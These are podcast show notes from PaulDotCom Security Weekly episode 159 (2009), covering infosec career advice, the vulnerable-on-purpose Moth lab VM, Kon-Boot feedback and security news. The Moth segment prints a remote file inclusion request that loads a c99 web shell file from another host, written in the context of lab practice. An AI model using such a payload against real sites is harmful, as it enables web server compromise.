Episode159

From Paul's Security Weekly
Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security

Sponsors

  • Tenable Network Security - This episode sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the worlds best penetration testing tool.
  • Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!

Announcements & Shameless Plugs

PaulDotCom Security Weekly - Episode 159 - July 9th, 2009

  • NY Infraguard CTF - Two day Capture the Flag Event on July 21 - 22, 2009 at Cisco Systems, 1 Penn Plaza, 9th Floor. The event will be held from 9:00AM to 5:00 PM both days.
  • DEFCON - Look for our "vendor table" where we will be selling t-shirts in all colors and sizes for $10. Carlos will be giving a presentation on Meterpreter, and Larry will participate in Defcon Poetry jam with the tantalizing title of "FAIL". We will also be having an invite-only party, so stay tuned
  • DEFCON Penthouse party in trouble. Paypal: Penthouse@siviak.org

Episode Media

mp3

Special Guest Interview With Lee Kushner & Mike Murray

Why Working On Your Career Is Becoming More and More Important to Success and Professional Satisfaction

  • Security is becoming more popular
  • Certification is a foundation – not an end game
  • Increasing Competition

Breaking In To The Information Security Profession

  1. Good knowledge – no experience – no job?
  2. How can you get started in the industry –
  3. Best ways to meet people –
  4. Build and establish credibility
  5. Turn your non infosec job into an infosec role
  6. What not to do

Upcoming InfoSecLeaders Podcast – “Breaking In to Information Security”

Hitting the Technical “Glass Ceiling”

Many people want to remain technical – but their earning potential is limited by this career choice.

  1. The reality of the situation – why it exists – what are the limitations
  2. How can you use your technical skills to advance in your current organizations
  3. Building other skills that compliment your technical background
    1. Choose Which Skills To Develop
      1. Leading projects
      2. Communication – Written and Oral
  4. Recognizing what types of organizations that value technical skills

Effective Career Planning

  1. Self Assessments
  2. Developing a Career Plan
  3. Setting Goals
  4. Building Brand/Network
  5. Choosing Strategic Career Investments
  6. Making Wise Career Choices

Resources

Tech Segment: PaulDotCom discusses Moth

I've tested several differnt vulnerable-on-purpose distributions over the past few months. From DVL, to Mutillidae, they have all helped me test software and practice hacking. Moth is one of the best ones around for web application practice, it includes a giagantic amount of software and has been a proving ground for web appl testing tools.

It was a bit tricky to get working, make sure you run this command:

$./sudo dpkg-reconfigure console-setup

The Moth VMware image is ready for download from the Bonsai - Information Security Services site.

There are three different ways to access the web applications and vulnerable scripts included in moth:

  1. Directly
  2. Through mod_security
  3. Through PHP-IDS (only if the web application is written in PHP)

Both mod_security and PHP-IDS have their default configurations and they show a log of the offending request when one is found. This is great because we can test our defensive measures too.

I used Nessus and easily found several vulnerabilities, including:

CGI Generic Remote File Inclusion Vulnerability

/w3af/audit/local_file_inclusion/trivial_lfi.php?file=http://192.168.1.26/c99.txt??

Also gave me a chance to test some RFI scripts, I found a good one on packetstorm.

So go download Moth and play!

Tech Segment: Mick Douglas receives some feedback on Kon-Boot

Boy did we ever get feedback! Thanks for the interest!

The amazing news... this works from the USB! Thanks for the great work IronGeek! :-)

Again, Kon-Boot doesn't (yet) work against systems that have Full Disk Encryption (FDE). So get your folks to 'crypt those disks.

Stories For Discussion

  1. Open Information Security Foundation looks for the PDC community input! - [mikep] - The foundation has been DHS funded to build a new IDS/GPL IDS Engine, and they are looking for input from the InfoSec commmunity.
  2. N. Korea attacks U.S. and South Korean government agencies for days - [mikep] - More FUD or 'proof' of a N. Korea cyberwar?
  3. ENISA Step by Step to setup a CSIRT - [Carlos] - ENISA is providing guidance on setting am Incicent Response Team
  4. MI6 Chief Reveled in Facebook - [Carlos] - Information can not only be leaked by a person but friend and family can further expose more info for targeted attacks.
  5. Zero day in MSVIDCTL.DLL MSF - [Carlos] - 0 Day Exploit module for the new MS Video ActiveX flaw from Trancer added to Metasploit
  6. Farewell Milw0rm, Long live Milw0rm! - [Larry] - Yep, Milw0rm shuttered. Hopefully you got the latest archive. Where will we get 'sploits now? A big thanks to str0ke and company for all they have done over the years. Str0ke, if you are out there listening, how can the community help? [Carlos] - Milw0rm site is taken down and retired by owner, a great loss to the security community. UPDATE - [byte_bucket] - The future of Milw0rm seems unclear. Str0ke made the following two relevant posts on twitter: post #1"I have talked with a few friends and I'll be handing the site over so a group of people can add exploits / other things to the site. Hopefully it will be a new good start - str0ke" , post #2"milw0rm's back up & posting will start once again, I can't let all of the emails in my submit box to just sit there. - str0ke"
  7. Wordpress Vuln - [Larry] - Yeah, I know, Wordpress. But the fine folks at Core Security Technologies discovered that there are several issues with authentication bypass that allows folks to configure plugins, and include javascript. A last count via google was something like 1.5 million sites with the old vulnerable version...
  8. Google Chrome OS - [Larry] - I mean who cares? I CARE! Neat, yet another Os for use to secure, and....attack on pentests. I just see this as yet another opportunity for us as pentests to be successful at compromising clients...if the track record of their browser carries over to their OS, this will be a cakewalk.
  9. ColdFusion - [Larry] - Nice. I know we don't cover ColdFusion often, but we should. Here's a nice couple of vulnerabilities in default modules that allow for file upload and XSS without authentication. Of course some defenses here allow the module to be configured to remove unused functionality, such as those affected...but are enabled by default. God forbid you copy the module in multiple locations.
  10. Holy Goldman Hacks! Er Sachs - [PaulDotCom] - This is scary. Why is it scary? Because all major financial institutions run software, and this software controls the global economy. Want proof? A programmer seriously effected how GS did in its trades by selling propriatary software to a competitor. He was picked up ASAP by the FBI. Yikes. Lots of talk about how to prevent this from happening. I don't think there is a good answer, other than pay your programmers a lot of money.
  11. Mystery of Donkey Kong Unbeatable level solved - [PaulDotCom] - turns out it was an integer overflow that ended the timer for the level before you could have a chance to finish. Neat!
  12. ActiveX 0Day in the wild - [PaulDotCom] - I first want to rant about the term remote. Remote has different meanings, like remote exploit for service that does not require interaction, and one that does. There should be a distinguishing factor. And even further tell us of the user has to click on something for it to work, other than the original web site you visited. Clear as mud huh?

Other Stories For Discussion

CompuServe is no more - [Mick] - I admit this shows my age, but I am fairly broken up by this. I had a great time using CompuServe and working for them/UUNet. Sigh, time marches on.